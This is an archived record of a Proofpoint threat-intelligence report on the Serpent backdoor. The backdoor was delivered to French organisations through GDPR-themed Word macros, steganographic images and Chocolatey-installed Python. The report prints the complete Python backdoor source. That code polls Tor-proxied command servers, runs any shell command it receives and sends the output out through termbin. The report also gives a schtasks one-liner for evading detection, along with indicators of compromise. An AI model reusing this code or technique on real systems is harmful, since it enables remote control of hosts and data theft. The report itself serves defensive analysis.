{
	"id": "76801209-f03c-402c-85cc-eb4be395d32a",
	"created_at": "2026-04-06T00:22:09.547741Z",
	"updated_at": "2026-04-10T03:20:39.814752Z",
	"deleted_at": null,
	"sha1_hash": "951f69e3bb01708e40102eb3fd4bd92a1af97925",
	"title": "Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2489448,
	"plain_text": "Serpent, No Swiping! New Backdoor Targets French Entities with\r\nUnique Attack Chain | Proofpoint US\r\nBy Bryan Campbell, Zachary Abzug, Andrew Northern and Selena Larson\r\nPublished: 2022-03-18 · Archived: 2026-04-05 20:20:49 UTC\r\nKey Findings\r\nProofpoint identified a targeted attack leveraging the open-source package installer Chocolatey to deliver a\r\nbackdoor.\r\nThe attack targeted French entities in the construction, real estate, and government industries.\r\nThe attacker used a resume-themed subject and lure purporting to be GDPR information.\r\nThe attacker used steganography, including a cartoon image, to download and install the Serpent backdoor.\r\nThe attacker also demonstrated a novel detection bypass technique using a Scheduled Task.\r\nObjectives are currently unknown; however, based on the tactics and targeting observed, it is likely an\r\nadvanced, targeted threat.\r\nOverview\r\nProofpoint observed new, targeted activity impacting French entities in the construction and government sectors.\r\nThe threat actor used macro-enabled Microsoft Word documents to distribute the Chocolatey installer package, an\r\nopen-source package installer. Various parts of the VBA macro include the following ASCII art and depict a snake\r\nas below.\r\nThe threat actor attempted to install a backdoor on a potential victim’s device, which could enable remote\r\nadministration, command and control (C2), data theft, or delivery of additional payloads. Proofpoint refers to\r\nthis backdoor as Serpent. 
The ultimate objective of the threat actor is currently unknown.\r\nCampaign Details\r\nhttps://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain\r\nPage 1 of 9\n\nIn the observed campaign, messages are in French and purport to be, for example:\r\nFrom: \"Jeanne\" \u003cjeanne.vrakele@gmail[.]com\u003e\r\nSubject: \"Candidature - Jeanne Vrakele\"\r\nThe messages contain a macro-enabled Microsoft Word document masquerading as information relating to the\r\n“règlement général sur la protection des données (RGPD)” or the European Union’s General Data Protection\r\nRegulation (GDPR).\r\nFigure 1: GDPR-themed lure.\r\nWhen macros are enabled, the document executes that macro, which reaches out to an image URL, e.g.,\r\nhttps://www.fhccu[.]com/images/ship3[.]jpg, containing a base64-encoded PowerShell script hidden in the image\r\nusing steganography. The PowerShell script first downloads, installs, and updates the Chocolatey installer package\r\nand repository script. Chocolatey is a software management automation tool for Windows that wraps installers,\r\nexecutables, zips, and scripts into compiled packages, similar to Homebrew for OSX. The software provides both\r\nopen-source and paid versions with various levels of functionality. Proofpoint has not previously observed a threat\r\nactor use Chocolatey in campaigns.\r\nThe script then uses Chocolatey to install Python, including the pip Python package installer, which it then uses to\r\ninstall various dependencies including PySocks, a Python-based reverse proxy client that enables users to send\r\ntraffic through SOCKS and HTTP proxy servers.\r\nNext, the script fetches another image file, e.g. https://www.fhccu[.]com/images/7[.]jpg, which contains a base64-encoded\r\nPython script also hidden using steganography, and saves the Python script as\r\nMicrosoftSecurityUpdate.py. 
The script then creates and executes a .bat file that in turn executes the Python script.\r\nThe attack chain ends with a command to a shortened URL which redirects to the Microsoft Office help website.\r\nFigure 2: “Swiper” image with base64-encoded PowerShell script to download and install Chocolatey and\r\nPython and fetch another steganographic image.\r\nThe Python script (the Serpent backdoor) is as follows:\r\n#!/usr/bin/python3\r\nfrom subprocess import Popen, PIPE, STDOUT\r\nimport requests\r\nimport re\r\nimport socket\r\nimport time\r\ncmd_url_order = 'http://mhocujuh3h6fek7k4efpxo5teyigezqkpixkbvc2mzaaprmusze6icqd.onion.pet/index.html'\r\ncmd_url_answer = 'http://ggfwk7yj5hus3ujdls5bjza4apkpfw5bjqbq4j6rixlogylr5x67dmid.onion.pet/index.html'\r\nhostname = socket.gethostname()\r\nhostname_pattern = 'host:%s-00' % hostname\r\nheaders = {}\r\nreferer = {'Referer': hostname_pattern}\r\ncache_control = {'Cache-Control': 'no-cache'}\r\nheaders.update(referer)\r\nheaders.update(cache_control)\r\ncheck_cmd_1 = ''\r\ndef recvall(sock, n):\r\n  data = b''\r\n  while len(data) \u003c n:\r\n    packet = sock.recv(n - len(data))\r\n    if not packet:\r\n      return None\r\n    data += packet\r\n  return data\r\ndef get_cmd():\r\n    req = requests.get(cmd_url_order, headers=headers).content.decode().strip()\r\n    if req == '':\r\n        pass\r\n    else:\r\n        return req\r\ndef run_cmd(cmd):\r\n    cmd_split = cmd.split('--')\r\n    if cmd_split[1] == hostname:\r\n        cmd = cmd_split[2]\r\n        print(cmd)\r\n        run = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT)#.decode()\r\n        out = run.stdout.read()\r\n        if not out:\r\n            out = 
b'ok'\r\n        termbin_cnx = socks.socksocket()\r\n        termbin_cnx = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n        socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '172.17.0.1', '9050', True)\r\n        termbin_cnx.connect(('termbin.com', 9999))\r\n        termbin_cnx.send(out)\r\n        recv = termbin_cnx.recv(100000)\r\n        termbin_url_created = recv.decode().rstrip('\\x00').strip()\r\n        print(termbin_url_created)\r\n        termbin_header = {'Referer': hostname_pattern+\" -- \"+termbin_url_created}\r\n        headers.update(termbin_header)\r\n        try:\r\n            push = requests.get(cmd_url_answer, headers=headers)\r\n            print('executed')\r\n            headers.update(referer)\r\n        except Exception as e:\r\n            print(e)\r\n            pass\r\n    else:\r\n        print('not for me')\r\nwhile True:\r\n    time.sleep(10)\r\n    try:\r\n        check_cmd = get_cmd()\r\n        if check_cmd != check_cmd_1:\r\n            time.sleep(20)\r\n            print(check_cmd)\r\n            run_cmd(check_cmd)\r\n            check_cmd_1 = check_cmd\r\n            pass\r\n    except Exception as e:\r\n        print(e)\r\n        pass\r\nThis Serpent backdoor periodically pings the “order” server (the first onion[.]pet URL) and expects responses of\r\nthe form \u003crandom integer\u003e--\u003chostname\u003e--\u003ccommand\u003e. If \u003chostname\u003e matches the hostname of the infected\r\ncomputer, the infected host runs the command provided by the order server (\u003ccommand\u003e), which could be any\r\nWindows command as designated by the attacker, and records the output. 
The malware then uses PySocks to\r\nconnect to the command-line pastebin tool Termbin, pastes the output to a bin, and receives the bin’s unique URL.\r\nFinally, the malware sends a request to the “answer” server (the second onion[.]pet URL), including the hostname\r\nand bin URL in the header. This allows the attacker to monitor the bin outputs via the “answer” URL and see what\r\nthe infected host’s response was. The malware cycles through this process indefinitely.\r\nFigure 3: Serpent backdoor attack chain.\r\nBoth steganographic images are hosted on what appears to be a Jamaican credit union website.\r\nFigure 4: Image with base64-encoded Python script.\r\nThe threat actor uses a Tor proxy for command and control (C2) infrastructure, for example:\r\nhttp://mhocujuh3h6fek7k4efpxo5teyigezqkpixkbvc2mzaaprmusze6icqd[.]onion[.]pet/index.html\r\nAdditional Tooling\r\nIn addition to the images used in this attack chain, Proofpoint researchers have observed and identified additional\r\npayloads being served from the same host. One of particular interest is utilizing what Proofpoint believes to be a\r\nnovel application of signed binary proxy execution using schtasks.exe. 
Notably, this is an attempt to bypass\r\ndetection by defensive measures.\r\nThis command is contained within a similar Swiper image called ship.jpg after the end-of-file marker.\r\nschtasks.exe /CREATE /SC ONEVENT /EC application /mo *[System/EventID=777] /f /TN run /TR \"calc.exe\" \u0026\r\nEVENTCREATE /ID 777 /L APPLICATION /T INFORMATION /SO DummyEvent /D \"Initiatescheduled task.\"\r\n\u0026  schtasks.exe /DELETE /TN run /f\r\nThe above command leverages schtasks.exe to create a one-time task to call a portable executable. In this case, the\r\nexecutable is called calc.exe. The trigger for this task is contingent on the creation of a Windows event with\r\nEventID of 777. The command then creates a dummy event to trigger the task and deletes the task from the task\r\nscheduler. This peculiar application of tasking logic results in the portable executable being executed as a child\r\nprocess of taskhostsw.exe, which is a signed Windows binary.\r\nThreat Assessment\r\nThe threat actor leveraged multiple unique behaviors and targeting, suggesting this is likely an advanced, targeted\r\nthreat.\r\nLeveraging Chocolatey as an initial payload may allow the threat actor to bypass threat detection mechanisms\r\nbecause it is a legitimate software package and would not immediately be identified as malicious. The follow-on\r\nuse of legitimate Python tools observed in network traffic may also not be flagged or identified as malicious. The\r\nuse of steganography in the macro and follow-on payloads is unique; Proofpoint rarely observes the use of\r\nsteganography in campaigns. Additionally, the technique using schtasks.exe to execute any desired portable\r\nexecutable file is also unique and previously unobserved by Proofpoint threat researchers.\r\nProofpoint does not associate this threat with a known actor or group.\r\nThe ultimate objectives of the threat actor are presently unknown. 
Successful compromise would enable a threat\r\nactor to conduct a variety of activities, including stealing information, obtaining control of an infected host, or\r\ninstalling additional payloads.\r\nA Note on Highly Targeted Threats\r\nProofpoint has a vast amount of organic threat data to pore over every day. This presents unique challenges when\r\ntrying to surface interesting threats. The aforementioned campaign and the threats contained within were surfaced\r\nusing Proofpoint’s machine-learning-enabled Campaign Discovery tool. This tool uses a custom-built deep neural\r\nnetwork model to generate useful numeric “encodings” of threats based on their behavioral forensics. These\r\nencodings are then used to generate clusters of similar threats. This allows Proofpoint’s threat researchers to more easily\r\nidentify campaigns, including the shared infrastructure, TTPs, and indicators of compromise that define them.\r\nBy clustering together threats that are alike, the tool also facilitates the discovery of anomalous or\r\nunusual threats that are not similar to any other observed threats. 
We lovingly refer to this tool as Camp Disco and\r\nit sports themed ASCII art like all sweet tools should.\r\nIndicators of Compromise\r\nIndicator Description\r\nhttps://www[.]fhccu[.]com/images/ship3[.]jpg Encoded Payload URL\r\nhttps://www[.]fhccu[.]com/images/7[.]jpg Encoded Payload URL\r\nhttp://ggfwk7yj5hus3ujdls5bjza4apkpfw5bjqbq4j6rixlogylr5x67dmid[.]onion[.]pet/index[.]html C2\r\nhttp://mhocujuh3h6fek7k4efpxo5teyigezqkpixkbvc2mzaaprmusze6icqd[.]onion[.]pet/index[.]html C2\r\nhttp://shorturl[.]at/qzES8 ShortURL\r\njeanne.vrakele@gmail[.]com Sender Email\r\njean.dupontel@protonmail[.]com Sender Email\r\nno-reply@dgfip-nanterre[.]com Sender Email\r\nf988e252551fe83b5fc3749e1d844c31fad60be0c25e546c80dbb9923e03eaf2 Docm SHA256\r\nec8c8c44eae3360be03e88a4bc7bb03f3de8d0a298bff7250941776fcea9faab Docm SHA256\r\n8912f7255b8f091e90083e584709cf0c69a9b55e09587f5927c9ac39447d6a19 Docm SHA256\r\nProofpoint detects and blocks all documents associated with the campaigns and has published the following\r\nEmerging Threat signatures:\r\n2035303 - ET INFO Observed Chocolatey Windows Package Management Domain (chocolatey .org in TLS SNI)\r\n2035306 - ET INFO Chocolatey Windows Package Management Installation File Retrieval\r\n2851286 - ETPRO MALWARE Malicious Script Retrieved via Image Request\r\nSource: https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain"
	],
	"report_names": [
		"serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain"
	],
	"threat_actors": [],
	"ts_created_at": 1775434929,
	"ts_updated_at": 1775791239,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/951f69e3bb01708e40102eb3fd4bd92a1af97925.pdf",
		"text": "https://archive.orkl.eu/951f69e3bb01708e40102eb3fd4bd92a1af97925.txt",
		"img": "https://archive.orkl.eu/951f69e3bb01708e40102eb3fd4bd92a1af97925.jpg"
	}
}